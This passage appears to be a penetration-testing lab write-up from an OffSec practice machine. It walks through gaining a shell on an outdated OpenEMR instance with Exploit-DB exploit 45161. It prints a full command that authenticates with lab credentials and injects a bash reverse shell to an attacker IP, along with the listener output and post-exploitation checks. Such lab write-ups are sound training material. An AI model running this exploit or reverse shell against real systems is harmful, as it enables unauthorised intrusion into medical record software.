RCE
The target OpenEMR instance has been identified as obsolete and affected by multiple critical vulnerabilities.
I'll be trying the RCE exploit targeting 5.0.1.3.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ searchsploit -m php/webapps/45161.py ; mv 45161.py openemr_rce.py
Exploit: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/45161
Path: /usr/share/exploitdb/exploits/php/webapps/45161.py
Codes: N/A
Verified: True
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/apex/45161.py
It should work, given that the target instance is 5.0.1.1.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ python2 openemr_rce.py http://apex.offsec/openemr -u admin -p thedoctor -c 'bash -c "/bin/bash -i >& /dev/tcp/192.168.45.215/9999 0>&1"'
.---. ,---. ,---. .-. .-.,---. ,---.
/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\
| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/
| | | | | |--' | .-' | |\ || .-' (_)\/ || (
\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \
)---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\
(_) (__) (__) (__) (__) '-' '-' (__)
={ P R O J E C T I N S E C U R I T Y }=
Twitter : @Insecurity
Site : insecurity.sh
[$] Authenticating with admin:thedoctor
[$] Injecting payload
Executing the exploit with the reverse shell payload:
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.196.145] 55688
bash: cannot set terminal process group (1324): Inappropriate ioctl for device
bash: no job control in this shell
www-data@APEX:/var/www/openemr/interface/main$ whoami
whoami
www-data
www-data@APEX:/var/www/openemr/interface/main$ hostname
hostname
APEX
www-data@APEX:/var/www/openemr/interface/main$ ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.196.145 netmask 255.255.255.0 broadcast 192.168.196.255
ether 00:50:56:9e:b0:75 txqueuelen 1000 (Ethernet)
RX packets 58138 bytes 7798019 (7.7 MB)
RX errors 0 dropped 1987 overruns 0 frame 0
TX packets 12462 bytes 6666983 (6.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1934 bytes 175190 (175.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1934 bytes 175190 (175.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target system as the www-data account by exploiting the target OpenEMR instance.